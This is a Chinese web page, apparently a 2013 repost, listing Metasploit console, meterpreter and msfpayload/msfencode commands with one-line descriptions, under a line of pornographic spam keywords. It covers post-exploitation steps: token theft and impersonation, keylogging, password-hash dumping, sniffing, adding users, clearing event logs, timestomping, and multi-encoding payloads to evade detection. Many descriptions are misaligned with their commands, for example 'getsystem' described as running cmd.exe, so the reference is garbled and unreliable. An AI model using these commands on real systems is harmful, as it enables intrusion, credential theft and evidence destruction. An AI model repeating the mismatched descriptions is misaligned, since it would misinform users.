欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

Metasploit 常用滲透命令大全

  發(fā)布時(shí)間:2013-08-02 23:16:50   作者:佚名   我要評(píng)論
這篇文章主要介紹了Metasploit的一些常用滲透命令,需要檢測(cè)網(wǎng)站安全的朋友可以收藏下

show exploits

查找metasploit框架中所有的其他模塊。
info

你本地可以讓目標(biāo)主機(jī)連接的IP地址,通常當(dāng)目標(biāo)主機(jī)不在同一個(gè)局域網(wǎng)內(nèi)時(shí),就需要是一個(gè)公共IP地址,特別為反彈式shell使用。
RHOST

遠(yuǎn)程主機(jī)或是目標(biāo)主機(jī)。
set function

設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))。
setg function

以全局方式設(shè)置特定的配置參數(shù)(EG:設(shè)置本地或遠(yuǎn)程主機(jī)參數(shù))。
show options

指定你所知道的目標(biāo)的操作系統(tǒng)以及補(bǔ)丁版本類型。
set payload name

列出所有高級(jí)配置選項(xiàng)。
set autorunscript migrate -f.

列出exploit命令的幫助信息。
sessions -l

列出可用的交互會(huì)話(在處理多個(gè)shell時(shí)使用)。
sessions -l -v

在所有活躍的metasploit會(huì)話中運(yùn)行一個(gè)特定的metasploit腳本。
sessions -K

終止所有活躍的交互會(huì)話。
sessions -c cmd

在所有活躍的metasploit會(huì)話上執(zhí)行一個(gè)命令。
sessions -u sessionID

升級(jí)一個(gè)普通的win32 shell到metasploit shell。
db_create name

利用nmap并把掃描數(shù)據(jù)存儲(chǔ)到數(shù)據(jù)庫(kù)中(支持普通的nmap語(yǔ)句,EG:-sT -v -P0)。
db_autopwn -h

展示出db_autopwn命令的幫助信息。
db_autopwn -p -r -e

刪除當(dāng)前數(shù)據(jù)庫(kù)。
db_destroy user:passwd@host:port/database

使用高級(jí)選項(xiàng)來(lái)刪除數(shù)據(jù)庫(kù)。
***metasploit命令***

help

打開(kāi)meterpreter使用幫助。
run scriptname

運(yùn)行meterpreter腳本,在scripts/meterpreter目錄下可以查看到所有腳本名。
sysinfo

列出受控主機(jī)的系統(tǒng)信息。
ls

列出目標(biāo)主機(jī)的文件和文件夾信息。
use priv

加載特權(quán)提升擴(kuò)展模塊,來(lái)擴(kuò)展metasploit庫(kù)。
ps

顯示所有運(yùn)行的進(jìn)程以及相關(guān)聯(lián)的用戶賬戶。
migrate PID

遷移到一個(gè)指定的進(jìn)程ID(PID號(hào)可通過(guò)ps命令從主機(jī)上獲得)。
use incognito

加載incognito功能(用來(lái)盜竊目標(biāo)主機(jī)的令牌或假冒用戶)
list_tokens -u

列出目標(biāo)主機(jī)用戶的可用令牌。
list_tokens -g

列出目標(biāo)主機(jī)用戶組的可用令牌。
impersonate_token DOMAIN_NAME\USERNAME

假冒目標(biāo)主機(jī)上的可用令牌。
steal_token PID

停止假冒當(dāng)前令牌。
getsystem

執(zhí)行cmd.exe命令并進(jìn)行交互。
execute -f cmd.exe -i -t

以所有可用令牌來(lái)執(zhí)行cmd命令并隱藏該進(jìn)程。
rev2self

回到控制目標(biāo)主機(jī)的初始用戶賬戶下。
reg command

在目標(biāo)主機(jī)注冊(cè)表中進(jìn)行交互,創(chuàng)建,刪除,查詢等操作。
setdesktop number

切換到另一個(gè)用戶界面(該功能基于那些用戶已登錄)。
screenshot

對(duì)目標(biāo)主機(jī)的屏幕進(jìn)行截圖。
upload file

向目標(biāo)主機(jī)上傳文件。
download file

從目標(biāo)主機(jī)下載文件。
keyscan_start

針對(duì)遠(yuǎn)程目標(biāo)主機(jī)開(kāi)啟鍵盤(pán)記錄功能。
keyscan_dump

存儲(chǔ)目標(biāo)主機(jī)上捕獲的鍵盤(pán)記錄。
keyscan_stop

停止針對(duì)目標(biāo)主機(jī)的鍵盤(pán)記錄。
getprivs

盡可能多的獲取目標(biāo)主機(jī)上的特權(quán)。
uictl enable keyboard/mouse

接管目標(biāo)主機(jī)的鍵盤(pán)和鼠標(biāo)。
background

將你當(dāng)前的metasploit shell轉(zhuǎn)為后臺(tái)執(zhí)行。
hashdump

導(dǎo)出目標(biāo)主機(jī)中的口令哈希值。
use sniffer

加載嗅探模式。
sniffer_interfaces

列出目標(biāo)主機(jī)所有開(kāi)放的網(wǎng)絡(luò)端口。
sniffer_dump interfaceID pcapname

在目標(biāo)主機(jī)上啟動(dòng)嗅探。
sniffer_start interfaceID packet-buffer

在目標(biāo)主機(jī)上針對(duì)特定范圍的數(shù)據(jù)包緩沖區(qū)啟動(dòng)嗅探。
sniffer_stats interfaceID

獲取正在實(shí)施嗅探網(wǎng)絡(luò)接口的統(tǒng)計(jì)數(shù)據(jù)。
sniffer_stop interfaceID

停止嗅探。
add_user username password -h ip

在遠(yuǎn)程目標(biāo)主機(jī)上添加一個(gè)用戶。
clearev

清楚目標(biāo)主機(jī)上的日志記錄。
timestomp

修改文件屬性,例如修改文件的創(chuàng)建時(shí)間(反取證調(diào)查)。
reboot

重啟目標(biāo)主機(jī)。
***MSFpayload命令***

msfpayload -h

msfpayload的幫助信息。
msfpayload windows/meterpreter/bind_tcp O

mefencode -h

列出msfencode的幫助命令。
msfencode -l

列出所有可用的編碼器。
msfencode -t (c,elf,exe,java,is_le,js_be,perl,raw,ruby,vba,vbs,loop_vbs,asp,war,macho)

顯示編碼緩沖區(qū)的格式。
msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

使用shikata_ga_nai編碼器對(duì)payload.raw文件進(jìn)行5編碼,然后導(dǎo)出一個(gè)名為encoded_payload.exe的文件。
msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/_countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

創(chuàng)建一個(gè)純字母數(shù)字的shellcode,由ESI寄存器只想shellcode,以C語(yǔ)言格式輸出。
***MSFcli命令***

msfcli | grep exploit

相關(guān)文章

最新評(píng)論